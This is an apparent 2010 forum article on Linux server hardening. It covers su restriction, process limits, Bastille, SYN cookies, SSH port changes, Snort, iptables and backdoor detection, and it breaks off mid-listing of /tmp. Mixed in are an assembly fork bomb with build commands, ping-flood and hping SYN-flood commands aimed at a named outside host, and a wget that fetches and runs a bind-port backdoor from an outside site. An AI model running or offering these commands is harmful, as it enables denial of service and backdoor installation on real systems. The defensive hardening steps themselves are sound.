Linux Server Hardening and Auditing Author: mywisdom Date: Apr 22 2010 Ok back with me again mywisdom, now I'm gonna write a little article about linux server hardening Tricks. So here we go: [b]Disable su for non wheel group[/b] Ok to disable su for non wheel group We need to edit su file located at /etc/pam.d directory: [code] nano /etc/pam.d/su [/code] then uncomment this by deleting the # char: [code] auth required pam_wheel.so use_id [/code] if there no line like that you may just copy and paste that line to your su file at /etc/pam.d [b]Prevent Fork Bomb[/b] Fork bomb is a very dangerous issue on linux, If you have a box shich don't limit any user processes on that system once a user running a fork bomb it will create infinite looping that creates processes that will make your box crash. To limit max process of a single user can create on your box, you need to edit /etc/security/limits.conf [code] nano /etc/security/limits.conf [/code] then u need to set nproc, it's the max number of process of an user can create. Here is a sample line to limit max process of any user within wheel group: [code] @wheel hard nproc 10 [/code] That line will limit all users in wheel group to 10 max process sample for limiting max process of a single user (ex: username is mywisdom ): [code] mywisdom hard nproc 10 [/code] here's a sample code for fork bomb for testing your box: filename: bomb.asm [code] section .text global _start _start: push byte 2 pop eax int 0x80 jmp short _start [/code] compile and testing: [code] nasm -f elf bomb.asm ld -o bomb bomb.o ./bomb [/code] [b]Installing Bastille[/b] Bastille is a very good utility to secure your box. ok next let's install bastille [code] mywisdom@devilzc0der~#wget http://prdownloads.sourceforge.net/bastille-linux/Bastille-3.2.1-0.1.noarch.rpm?download mywisdom@devilzc0der~#rpm -ivh --nodeps Bastille-3.2.1-0.1.noarch.rpm Preparing... ########################################### [100%] 1:Bastille ########################################### [100%] mywisdom@devilzc0der~# [/code] or u may install from tarball source: [code] mywisdom@devilzc0der~#wget http://prdownloads.sourceforge.net/bastille-linux/Bastille-3.0.9.tar.bz2?download mywisdom@devilzc0der~#tar -xjvf Bastille-3.0.9.tar.bz2 Bastille/ Bastille/bastille-tmpdir.csh Bastille/VERSION Bastille/ifup-local Bastille/OSMap/ Bastille/OSMap/LINUX.system Bastille/OSMap/LINUX.bastille Bastille/OSMap/HP-UX.service Bastille/OSMap/HP-UX.system Bastille/OSMap/LINUX.service Bastille/OSMap/OSX.system Bastille/OSMap/OSX.bastille Bastille/OSMap/HP-UX.bastille Bastille/RevertBastille Bastille/WorkstationLax.config Bastille/mandrake_perm.5 Bastille/bastille.jpg Bastille/WorkstationModerate.config Bastille/Curses/ Bastille/Curses/Widgets.pm Bastille/psad/ Bastille/psad/whois-4.5.6/ Bastille/psad/whois-4.5.6/debian/ Bastille/psad/whois-4.5.6/po/ Bastille/psad/whois-4.5.29/ Bastille/psad/whois-4.5.29/debian/ Bastille/psad/whois-4.5.29/po/ Bastille/psad/Psad.pm/ Bastille/psad/Unix-Syslog-0.98/ Bastille/firewall/ Bastille/firewall/portforward.sh Bastille/firewall/fwnotes.txt Bastille/bastille-firewall-pre-audit.sh Bastille/mandrake_perm.2 Bastille/Bastille_Tk.pm Bastille/Bastille/ Bastille/Bastille/IPFilter.pm Bastille/Bastille/#test_FilePermissions.pm# Bastille/Bastille/Patches.pm Bastille/Bastille/OSX_API.pm Bastille/Bastille/TestAPI.pm Bastille/Bastille/test_BootSecurity.pm Bastille/Bastille/test_DNS.pm Bastille/Bastille/BootSecurity.pm Bastille/Bastille/Logging.pm Bastille/Bastille/PSAD.pm Bastille/Bastille/LogAPI.pm Bastille/Bastille/test_FilePermissions.pm Bastille/Bastille/ConfigureMiscPAM.pm Bastille/Bastille/SecureInetd.pm Bastille/Bastille/MiscellaneousDaemons.pm Bastille/Bastille/API.pm Bastille/Bastille/test_AccountSecurity.pm Bastille/Bastille/Firewall.pm Bastille/Bastille/test_SecureInetd.pm Bastille/Bastille/FTP.pm Bastille/Bastille/.#test_MiscellaneousDaemons.pm.1.15 Bastille/Bastille/PatchDownload.pm Bastille/Bastille/test_Printing.pm Bastille/Bastille/.#test_AccountSecurity.pm.1.20 Bastille/Bastille/test_Apache.pm Bastille/Bastille/DisableUserTools.pm Bastille/Bastille/IOLoader.pm Bastille/Bastille/RemoteAccess.pm Bastille/Bastille/API.pm.sweth Bastille/Bastille/Apache.pm Bastille/Bastille/.#AccountSecurity.pm.1.82 Bastille/Bastille/TMPDIR.pm Bastille/Bastille/test_ConfigureMiscPAM.pm Bastille/Bastille/HP_UX.pm Bastille/Bastille/DNS.pm Bastille/Bastille/test_Logging.pm Bastille/Bastille/test_Sendmail.pm Bastille/Bastille/AccountSecurity.pm Bastille/Bastille/HP_API.pm Bastille/Bastille/test_HP_UX.pm Bastille/Bastille/test_MiscellaneousDaemons.pm Bastille/Bastille/test_DisableUserTools.pm Bastille/Bastille/Printing.pm Bastille/Bastille/test_FTP.pm Bastille/Bastille/Sendmail.pm Bastille/Bastille/FilePermissions.pm Bastille/Bastille/.#IOLoader.pm.1.65 Bastille/Bastille/.#test_FTP.pm.1.3 Bastille/FKL.weights Bastille/workstation_configurations.txt Bastille/InteractiveBastille Bastille/ServerLax.config Bastille/bastille-ipchains Bastille/mandrake_perm.3 Bastille/Changelog Bastille/jail.bind.hpux Bastille/bastille-firewall-early.sh Bastille/bastille-firewall Bastille/Weights.txt Bastille/README.1st Bastille/ServerModerate.config Bastille/BastilleBackEnd Bastille/README.non-rpm Bastille/BastilleChooser Bastille/Server-modify-by-Spong Bastille/README.Adding-Questions Bastille/incomplete.xbm Bastille/bastille-tmpdir-defense.sh Bastille/bastille-netfilter Bastille/Credits Bastille/Install-OSX.sh Bastille/Modules.txt Bastille/bastille-firewall-reset Bastille/mandrake_perm.1 Bastille/Questions/ Bastille/Questions/#Patches.txt# Bastille/Questions/PSAD.txt Bastille/Questions/ConfigureMiscPAM.txt Bastille/Questions/BootSecurity.txt Bastille/Questions/HP_UX.txt Bastille/Questions/Sendmail.txt Bastille/Questions/Firewall.txt Bastille/Questions/DNS.txt Bastille/Questions/Apache.txt Bastille/Questions/SecureInetd.txt Bastille/Questions/Printing.txt Bastille/Questions/MiscellaneousDaemons.txt Bastille/Questions/AccountSecurity.txt Bastille/Questions/FTP.txt Bastille/Questions/Logging.txt Bastille/Questions/FilePermissions.txt Bastille/Questions/DisableUserTools.txt Bastille/Questions/TMPDIR.txt Bastille/Questions/IPFilter.txt Bastille/Questions/Patches.txt Bastille/bastille-firewall-install.sh Bastille/complete.xbm Bastille/BUGS Bastille/mandrake_perm.0 Bastille/Bastille_Curses.pm Bastille/jail.bind9.hpux Bastille/server_configurations.txt Bastille/Bastille_Audit.pm Bastille/hosts.allow Bastille/docs/ Bastille/docs/readme.interfaces Bastille/docs/readme.patch Bastille/docs/user_guide.txt Bastille/docs/bastille.1m Bastille/docs/readme.automate Bastille/docs/readme.ftp Bastille/docs/README Bastille/readme.1.1.x Bastille/Questions.txt Bastille/tools/ Bastille/tools/smb.patch Bastille/tools/bastille-firewall-convert.sh Bastille/tools/README.smb Bastille/FKL/ Bastille/FKL/configs/ Bastille/FKL/configs/fkl_config_suse.cfg Bastille/FKL/configs/fkl_config_redhat.cfg Bastille/COPYING Bastille/bin/ Bastille/bin/bastille Bastille/jail.generic.hpux Bastille/mandrake_perm.4 Bastille/bastille-tmpdir.sh Bastille/mandrake_server.4 Bastille/ipf.customrules Bastille/Install.sh Bastille/.#VERSION.1.34 Bastille/find_bastille_affected_files.pl Bastille/.#Install.sh.1.24 Bastille/#Bastille_Audit.pm# Bastille/WorkstationParanoia.config Bastille/bastille-firewall.cfg Bastille/AutomatedBastille Bastille/bastille-firewall-schedule Bastille/README Bastille/ServerParanoia.config Bastille/wz_tooltip.js Bastille/mandrake_server.5 mywisdom@devilzc0der~#umask 777 mywisdom@devilzc0der~#RPM_BUILD_ROOT="" mywisdom@devilzc0der~#cd Bastille;./Install.sh [/code] Then run bastille for the first time: [code] bastille -c [/code] [b]Disable icmp echo request[/b] Ok as we already know there are many dos or ddos attacks that send large icmp packets to crash the server. So now, we are going to disable icmp echo request, Here we go: [code] mywisdom@devilzc0der~#sysctl -w net.ipv4.icmp_echo_ignore_all=1 net.ipv4.icmp_echo_ignore_all = 1 mywisdom@devilzc0der~#ping localhost PING localhost (127.0.0.1) 56(84) bytes of data. [/code] See??? no more icmp reply !!! gotcha !!! ;-p contras: Here is an example how you can do a simple icmp attack: [code] ping -fs 50000 www.tbd.my [/code] [b]Blocking SYN Attack on your Box[/b] Many DDOSER (include me, I used to DDOS ;-p) uses syn attack nowadays, so we need to block it ;-p , here we go: [code] mywisdom@kernel-patcher#sysctl -w net.ipv4.tcp_syncookies=1 net.ipv4.tcp_syncookies = 1 mywisdom@kernel-patcher#echo "Done already :-p" [/code] Here's how to do a sample of syn attack using hping: [code] hping -i u1 -S -p 80 www.tbd.my [/code] uses at your own risk [b]Kernel Patching[/b] Kernel patching is important for preventing your box for rootman [code] mywisdom@kernel-patcher#cd /usr/src/linux mywisdom@kernel-patcher#uname -a Linux xxxxxx 2.6.21.5 #2 SMP Thu Apr 10 04:23:56 GMT 2008 i686 Intel(R) Core(TM)2 Duo CPU T5670 @ 1.80GHz GenuineIntel GNU/Linux mywisdom@kernel-patcher#wget http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.21.5.gz --06:22:29-- http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.21.5.gz => `patch-2.6.21.5.gz' Resolving www.kernel.org... 199.6.1.164, 204.152.191.37, 130.239.17.4, ... Connecting to www.kernel.org|199.6.1.164|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 48,881 (48K) [application/x-gzip] 100%[====================================>] 48,881 30.60K/s 06:22:34 (30.57 KB/s) - `patch-2.6.21.5.gz' saved [48881/48881] mywisdom@kernel-patcher#gunzip patch-2.6.21.5.gz mywisdom@kernel-patcher#patch -p1 < patch-2.6.21.5 [/code] [b]Change Default SSH Port[/b] Default ssh port is always 22, so let's change it, as example i change ssh port into port: 31337 [code] mywisdom@31337~#nano /etc/ssh/sshd_config [code] then find this line: [code] Port 22 [/code] and then change it by: [code] Port 31337 [/code] then restart your ssh daemon: [code] /etc/init.d/sshd restart [/code] [b]How to detect malicious backdoors using netstat and chkconfig and ps to check for malicious backdoor / daemon / malicious process[/b] Ok for a real life testing, let's try to install a malicious bind port shell (for testing only): [code] mywisdom@31337~#wget http://yoyoparty.com/upload/bdp --2010-04-22 01:57:25-- http://yoyoparty.com/upload/bdp Sl??r upp yoyoparty.com... 211.189.69.116 Ansluter till yoyoparty.com|211.189.69.116|:80... ansluten. HTTP-beg??ran skickad, v??ntar p?? svar... 200 OK L??ngd: 594 [text/plain] Sparar till "bdp". 100%[======================================>] 594 --.-K/s p?? 0s 2010-04-22 01:57:26 (76,3 MB/s) - "bdp" sparad [594/594] mywisdom@31337~#chmod +x bdp mywisdom@31337~#./bdp 3338 & [2] 12093 mywisdom@31337~#Statement unlikely to be reached at ./bdp line 21. (Maybe you meant system() when you said exec()?) mywisdom@31337~# [/code] Ok as we see it's backdooring for port 3338, now let's check it using ps command: [code] mywisdom@31337~#ps aux [/code] Then if you notice we will see this malicious process: [code] root 12093 0.0 0.0 7048 2220 pts/1 S 01:58 0:00 /usr/bin/perl -w ./bdp 3338 [/code] To kill this malicious process just do this ( 12093 pid only sample, it different on every machine) : [code] kill 12093 [/code] Ok otherwise u may use netstat to check for malicious backdoors: [code] mywisdom@31337~#netstat -a Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:tcpmux *:* LISTEN tcp 0 0 *:licensedaemon *:* LISTEN tcp 0 0 *:infowave *:* LISTEN tcp 0 0 *:13123 *:* LISTEN tcp 0 0 *:radsec *:* LISTEN tcp 0 0 *:gnunet *:* LISTEN tcp 0 0 *:eli *:* LISTEN tcp 0 0 *:consul-insight *:* LISTEN tcp 0 0 *:anet-b *:* LISTEN tcp 0 0 *:mysql *:* LISTEN tcp 0 0 localhost:783 *:* LISTEN tcp 0 0 *:nbx-ser *:* LISTEN tcp 0 0 *:sunrpc *:* LISTEN tcp 0 0 *:nbx-dir *:* LISTEN tcp 0 0 *:http *:* LISTEN tcp 0 0 *:smtps *:* LISTEN tcp 0 0 *:ftp *:* LISTEN [/code] Ok we see there's a suspected backdoor at port 13123, let's check it using netcat [code] mywisdom@31337~#nc localhost 13123 bash: no job control in this shell [/code] shitz!!! it's a bindport backdoor dude, then you may use iptable to close that fuckin port: [code] mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 13123 -j REJECT mywisdom@devilzc0der~#nc localhost 13123 localhost [127.0.0.1] 13123 (?) : Connection refused mywisdom@devilzc0der~# [/code] ok other sample u may use chkconfig to check for malicious daemons: [code] mywisdom@31337~#chkconfig --list NetworkManager 0:av 1:av 2:av 3:av 4:av 5:av 6:av NetworkManagerDispatcher 0:av 1:av 2:av 3:av 4:av 5:av 6:av acpid 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av anacron 0:av 1:av 2:av 3:av 4:av 5:av 6:av auditd 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av autofs 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av avahi-daemon 0:av 1:av 2:av 3:av 4:av 5:av 6:av avahi-dnsconfd 0:av 1:av 2:av 3:av 4:av 5:av 6:av bandmin 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av bluetooth 0:av 1:av 2:av 3:av 4:av 5:av 6:av conman 0:av 1:av 2:av 3:av 4:av 5:av 6:av courier-authlib 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av courier-imap 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av cpanel 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av cpuspeed 0:av 1:p?? 2:p?? 3:p?? 4:p?? 5:p?? 6:av crond 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av csf 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av cups 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av dc_client 0:av 1:av 2:av 3:av 4:av 5:av 6:av dc_server 0:av 1:av 2:av 3:av 4:av 5:av 6:av dhcdbd 0:av 1:av 2:av 3:av 4:av 5:av 6:av dovecot 0:av 1:av 2:av 3:av 4:av 5:av 6:av dund 0:av 1:av 2:av 3:av 4:av 5:av 6:av exim 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av fastmail 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av filelimits 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av firstboot 0:av 1:av 2:av 3:p?? 4:av 5:p?? 6:av haldaemon 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av hidd 0:av 1:av 2:av 3:av 4:av 5:av 6:av httpd 0:av 1:av 2:av 3:p?? 4:av 5:p?? 6:av ibmasm 0:av 1:av 2:av 3:av 4:av 5:av 6:av ip6tables 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av ipaliases 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av ipmi 0:av 1:av 2:av 3:av 4:av 5:av 6:av iptables 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av irda 0:av 1:av 2:av 3:av 4:av 5:av 6:av irqbalance 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av kdump 0:av 1:av 2:av 3:av 4:av 5:av 6:av kudzu 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av lfd 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av lvm2-monitor 0:av 1:p?? 2:p?? 3:p?? 4:p?? 5:p?? 6:av mcstrans 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av mdmonitor 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av mdmpd 0:av 1:av 2:av 3:av 4:av 5:av 6:av messagebus 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av microcode_ctl 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av multipathd 0:av 1:av 2:av 3:av 4:av 5:av 6:av mysql 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av named 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av netconsole 0:av 1:av 2:av 3:av 4:av 5:av 6:av netfs 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av netplugd 0:av 1:av 2:av 3:av 4:av 5:av 6:av network 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av nfs 0:av 1:av 2:av 3:av 4:av 5:av 6:av nfslock 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av nscd 0:av 1:av 2:av 3:av 4:av 5:av 6:av ntpd 0:av 1:av 2:av 3:av 4:av 5:av 6:av oddjobd 0:av 1:av 2:av 3:av 4:av 5:av 6:av pand 0:av 1:av 2:av 3:av 4:av 5:av 6:av pcscd 0:av 1:av 2:av 3:av 4:av 5:av 6:av portsentry 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av psacct 0:av 1:av 2:av 3:av 4:av 5:av 6:av pure-ftpd 0:av 1:av 2:av 3:p?? 4:av 5:p?? 6:av rdisc 0:av 1:av 2:av 3:av 4:av 5:av 6:av readahead_early 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av readahead_later 0:av 1:av 2:av 3:av 4:av 5:p?? 6:av restorecond 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av ror 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av rpcgssd 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av rpcidmapd 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av rpcsvcgssd 0:av 1:av 2:av 3:av 4:av 5:av 6:av rwhod 0:av 1:av 2:av 3:av 4:av 5:av 6:av saslauthd 0:av 1:av 2:av 3:av 4:av 5:av 6:av securetmp 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av setroubleshoot 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av smartd 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av smb 0:av 1:av 2:av 3:av 4:av 5:av 6:av spamassassin 0:av 1:av 2:av 3:av 4:av 5:av 6:av squid 0:av 1:av 2:av 3:av 4:av 5:av 6:av sshd 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av syslog 0:av 1:av 2:p?? 3:p?? 4:p?? 5:p?? 6:av sysstat 0:av 1:av 2:p?? 3:p?? 4:av 5:p?? 6:av tux 0:av 1:av 2:av 3:av 4:av 5:av 6:av vsftpd 0:av 1:av 2:av 3:av 4:av 5:av 6:av winbind 0:av 1:av 2:av 3:av 4:av 5:av 6:av wpa_supplicant 0:av 1:av 2:av 3:av 4:av 5:av 6:av xinetd 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av yum-updatesd 0:av 1:av 2:av 3:p?? 4:p?? 5:p?? 6:av [/code] [b]Installing Snort and running Snort for Intrusion Detection System[/b] Snort is a very popular IDS (Intrusion Detection System) in linux, ok at first let's install snort: [code] mywisdom@31337~#rpm -ivh snort-2.8.5.3-1.src.rpm 1:snort ########################################### [100%] mywisdom@31337~# [/code] Snort has 3 mode(s): 1. sniffer mode 2. packet logger mode 3. Network IDS Mode Ok here's sample of using snort as packet dump (sniffer mode): [code] mywisdom@devilzc0der~#snort -v Running in packet dump mode --== Initializing Snort ==-- Initializing Output Plugins! Verifying Preprocessor Configurations! *** *** interface device lookup found: eth0 *** Initializing Network Interface eth0 Decoding Ethernet on interface eth0 --== Initialization Complete ==-- ,,_ -*> Snort! 213.136.42.130:22 TCP TTL:64 TOS:0x10 ID:32321 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xDA3F1274 Ack: 0x3212E0DD Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [/code] Ok here's our snort anlysis: 04/22-07:41:38.198492 192.168.153.132:32788 -> 213.136.42.130:22 TCP TTL:64 TOS:0x10 ID:32321 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xDA3F1274 Ack: 0x3212E0DD Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ - 04/22-07:41:38.198492 -> it's time, clear ok ?? - 192.168.153.132:32788 -> source ip:192.168.153.132, port:32788 - 213.136.42.130:22 -> destination ip and port. - TCP TTL:64 TOS:0x10 ID:32321 IpLen:20 DgmLen:40 DF -> protocol is tcp, time to live, type of service, packet indentification, length of packet Ok here's sample of running snort in packet logger mode [code] mywisdom@devilzc0der~#snort -dev -l /var/log/snort Running in packet logging mode Log directory = /var/log/snort --== Initializing Snort ==-- Initializing Output Plugins! Verifying Preprocessor Configurations! *** *** interface device lookup found: eth0 *** Initializing Network Interface eth0 Decoding Ethernet on interface eth0 --== Initialization Complete ==-- ,,_ -*> Snort! 0:50:56:FD:57:13 type:0x800 len:0x36 192.168.153.132:32788 -> 213.136.42.130:22 TCP TTL:64 TOS:0x10 ID:32335 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xDA3F13C4 Ack: 0x3212E31D Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/22-08:25:29.650784 0:50:56:FD:57:13 -> 0:C:29:E3:78:4D type:0x800 len:0x76 213.136.42.130:22 -> 192.168.153.132:32788 TCP TTL:128 TOS:0x0 ID:57468 IpLen:20 DgmLen:104 ***AP*** Seq: 0x3212E31D Ack: 0xDA3F13C4 Win: 0xFAF0 TcpLen: 20 66 64 76 8B 16 D5 66 F4 5C D2 A1 04 6D 05 2A C2 fdv...f.\...m.*. 7D DC D4 24 72 0D 84 D3 D7 56 A6 1D 89 36 6D 59 }..$r....V...6mY CF 61 C2 E8 61 D9 02 FB 64 0D C5 35 96 B3 15 DD .a..a...d..5.... 2C FB 3D 8A CA C3 68 E2 02 E4 A2 08 36 C2 3D D8 ,.=...h.....6.=. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/22-08:25:29.650826 0:C:29:E3:78:4D -> 0:50:56:FD:57:13 type:0x800 len:0x36 192.168.153.132:32788 -> 213.136.42.130:22 TCP TTL:64 TOS:0x10 ID:32336 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xDA3F13C4 Ack: 0x3212E35D Win: 0xFFFF TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [/code] Ok let's check our snort log: ____________________________________ mywisdom@devilzc0der~#cd /var/log/snort mywisdom@devilzc0der~#ls alert archive snort.log.1271924381 snort.log.1271924704 mywisdom@devilzc0der~#more snort.log.1271924381 ___________________________________ [b]open only needed port(s) playing with iptables[/b] Ok let's scan our box using nmap [code] mywisdom@31337~#nmap localhost Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2010-04-22 03:41 CEST Interesting ports on localhost (127.0.0.1): Not shown: 1661 closed ports PORT STATE SERVICE 1/tcp open tcpmux 21/tcp open ftp 80/tcp open http 93/tcp open imaps 31337/tcp open ssh 3306/tcp open mysql Nmap finished: 1 IP address (1 host up) scanned in 0.107 seconds mywisdom@31337~# [/code] Ok as for me a good server only need 2 open ports so the other need to be closed , here we may use iptables to simply that job: [code] mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 1 -j REJECT mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 21 -j REJECT mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 93 -j REJECT mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 3306 -j REJECT [/code] So only 2 open ports left, it's port 80 and port 31337 (our ssh port that we have set above) [b]Protection From DNS Cache Poisoning[/b] Ok here's a simple technic to prevent dns cache poisoning on our server, here we go white hats !!! preventing recursive request: [code] mywisdom@devilzc0der~#nano /etc/named.conf [code] Then add this into your /etc/named.conf: [code] options { recursion no; }; [/code] then we may use fake bind version to trick the attacker (the hacker) ;-p fine line with version info then replace with this (only sample): [code] version "Bind Anti Hacker" [/code] ;-p [b]Manual checking for possible malicious attacker on your system[/b] Ok I suggest you check oftenly for possible malicious attacker. Ok first let's check out /tmp directory as it's a world writable directory where a reckless attacker always put their backdoors and sploit over there: [code] mywisdom@31337~#cd /tmp;ls -la totalt 3499 drwxrwxrwt 20 root root 191488 22 apr 04.09 . drwxr-xr-x 24 root root 4096 18 apr 04.02 .. drwxr-xr-x 2 racimax racimax 1024 8 apr 06.50 ? drwxrwx--x 2 kyrksido kyrksido 1024 21 apr 05.03 04 -rw------- 1 rifixse rifixse 54038 3 sep 2009 08LFuYwxY7.zip -rw-r--r-- 1 racimax racimax 12107 20 apr 10.26 1.php -rw-r--r-- 1 racimax racimax 612 19 apr 23.33 818811119.txt -rwxr--r-- 1 root root 6144 9 mar 10.54 aquota.user -rw-r--r-- 1 racimax racimax 28385 9 apr 21.56 ave.txt -rw-r--r-- 1 racimax racimax 541 18 apr 19.42 back -rwxr-xr-x 1 racimax racimax 6241 18 apr 19.43 backc -rwxr-xr-x 1 racimax racimax 5748 17 apr 22.23 bc -rw-r--r-- 1 racimax racimax 438 17 apr 22.23 bc.pl -rwxr-xr-x 1 root mysql 594 25 feb 19.54 bdp -rw------- 1 rifixse rifixse 54038 3 sep 2009 bHIwOlANJm.zip -rwxr-xr-x 1 racimax racimax 6290 17 apr 22.23 bp drwxr-xr-x 2 root root 1024 9 maj 2008 cpbandwidth drwxrwx--x 2 kyrksido kyrksido 1024 21 apr 05.03 d0 drwxrwx--x 2 kyrksido kyrksido 1024 21 apr 05.03 e8 drwxrwx--x 2 kyrksido kyrksido 1024 21 apr 05.03 f1 drwxrwxrwt 2 root root 1024 7 apr 2008 .font-unix -rw-r--r-- 1 racimax racimax 5592 8 okt 2009 fs7100 -rw------- 1 cpanel cpanel 0 15 dec 05.17 .ftpquota drwxrwxrwt 2 root root 1024 14 dec 09.32 .ICE-unix drwxr-xr-x 2 racimax racimax 1024 29 mar 03.44 .log drwx------ 2 root root 12288 7 apr 2008 lost+found lrwxrwxrwx 1 root root 30 22 apr 04.04 mysql.sock -> ../../var/lib/mysql/mysql.sock -rw------- 1 racimax racimax 53788 25 feb 2009 oTrnweIWGD.zip -rw------- 1 racimax racimax 78096 15 apr 21.43 page.txt drwxr-xr-x 3 root root 1024 7 apr 2008 pear drwxr-xr-x 7 racimax racimax 1024 20 apr 19.40 .psy -rwxr--r-- 1 root root 32 9 mar 10.54 quota.user drwx------ 2 root root 1024 7 apr 2008 rcs05X3oJ drwx------ 2 root root 1024 7 apr 2008 rcs35WSLk drwx------ 2 root root 1024 7 apr 2008 rcsCnsRxQ drwx------ 2 root root 1024 7 apr 2008 rcsfU906O drwx------ 2 root root 1024 7 apr 2008 rcsU31Mf2 -rw------- 1 root root 1024 7 apr 2008 .rnd -rw------- 1 partysho partysho 10655 18 feb 07.34 sess_01ab3541de73e2f46888c7e175a47796 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_0307e54327d3f79740aaacfe6aa30194 -rw------- 1 kyrksido kyrksido 292 13 mar 20.04 sess_04374789dc193fe3b81ebd41b25b2f0d -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_05525c7db3f2c5c8fcbda53bf497f8fe -rw------- 1 kyrksido kyrksido 3053 24 mar 04.03 sess_0926d05dfde6fda0251613f3a9cf1ff2 -rw------- 1 ninibse ninibse 206 22 apr 03.47 sess_096f176addadc144d08b8bbb54d6be3d -rw------- 1 kyrksido kyrksido 0 29 mar 08.21 sess_1032b13794060a7321f8d1066f3b6972 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_11d1130056aa9676eb1b18d207b7e979 -rw------- 1 kyrksido kyrksido 2144 21 mar 01.19 sess_148dec914f5ff3043cbd0b1db3d8d989 -rw------- 1 kyrksido kyrksido 3273 9 apr 17.17 sess_15c534e393717453ba0267ccd3210581 -rw------- 1 ninibse ninibse 231 22 apr 04.07 sess_17605e42fd0d89901ac2fcac91e2381a -rw------- 1 kyrksido kyrksido 2674 20 apr 15.50 sess_19f3324698ad313032354aec4bbd1f51 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_1ac231014881236876b4badebd4e46f4 -rw------- 1 kyrksido kyrksido 292 17 apr 09.17 sess_1b13118ed801f36d4d9e8cbf85c6f063 -rw------- 1 kyrksido kyrksido 2144 15 mar 21.02 sess_1ba4880643d23d9ade6672233def4a5e -rw------- 1 kyrksido kyrksido 292 18 apr 19.06 sess_1cecd639df5623979c35659ced83d411 -rw------- 1 salmonss salmonss 98 14 apr 11.32 sess_1dd8b309d9a1c0080de707b0c31cb5d8 -rw------- 1 ninibse ninibse 254 22 apr 03.57 sess_1e715451568f2df36147d62c52521980 -rw------- 1 kyrksido kyrksido 292 12 mar 11.40 sess_1edcc038b1784b6a140bdb3eab6525fa -rw------- 1 kyrksido kyrksido 292 9 apr 05.04 sess_1f9db68feba4c49c174cf93b6f60ee11 -rw------- 1 kyrksido kyrksido 0 28 mar 10.42 sess_2046d8772ff9ffe9e40b17ff57a87622 -rw------- 1 kyrksido kyrksido 6936 20 apr 15.50 sess_244be6dbea0cb57922e047831bde687d -rw------- 1 salmonss salmonss 12582 1 dec 16.39 sess_27a59583e68a49edfa24a52155b1905c -rw------- 1 ninibse ninibse 231 22 apr 03.42 sess_27b2a6b284a4c0bd9fb84c083d7bc344 -rw------- 1 salmonss salmonss 901 14 apr 11.32 